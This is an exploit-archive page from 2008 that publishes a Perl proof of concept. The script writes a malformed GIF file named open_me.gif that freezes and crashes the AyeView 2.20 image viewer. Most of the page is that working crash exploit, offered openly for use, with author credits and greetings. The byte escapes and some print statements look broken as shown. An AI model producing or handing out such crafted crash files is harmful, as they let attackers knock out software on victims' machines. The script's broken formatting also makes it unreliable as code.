[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AyeView 2.20 (malformed gif image) Local Crash Exploit
# Published : 2008-10-04
# Author : suN8Hclf
# Previous Title : FastStone Image Viewer 3.6 (malformed bmp image) Crash Exploit
# Next Title : MS Windows Vista Access Violation from Limited Account Exploit (BSoD)
Name : AyeView v2.20 (malformed gif image) DoS Exploit
Credit : suN8Hclf (DaRk-CodeRs Group), crimson.loyd@gmail.com
Download: : http://www.ayeview.com/downloads.htm
Greetz : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind,
Katharsis, all from #dark-coders and others;]
PoC:
#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# AyeView freezes and after few seconds crashes...
# Tested on Windows XP SP2 & Windows 2000 SP4
my $code="x47x49x46x38x39x61xffxffxffxffx0e".
"x00x00x2cx00x00x00x00xffxffxffxffx00";
my $file="open_me.gif";
open(my $FILE, ">>$file") or die "[!]Cannot open file";
print $FILE $code;
close($FILE);
print "$file has been generatedn"
print "Credit: suN8Hclf, www.dark-coders.pl"
# www.Syue.com [2008-10-04]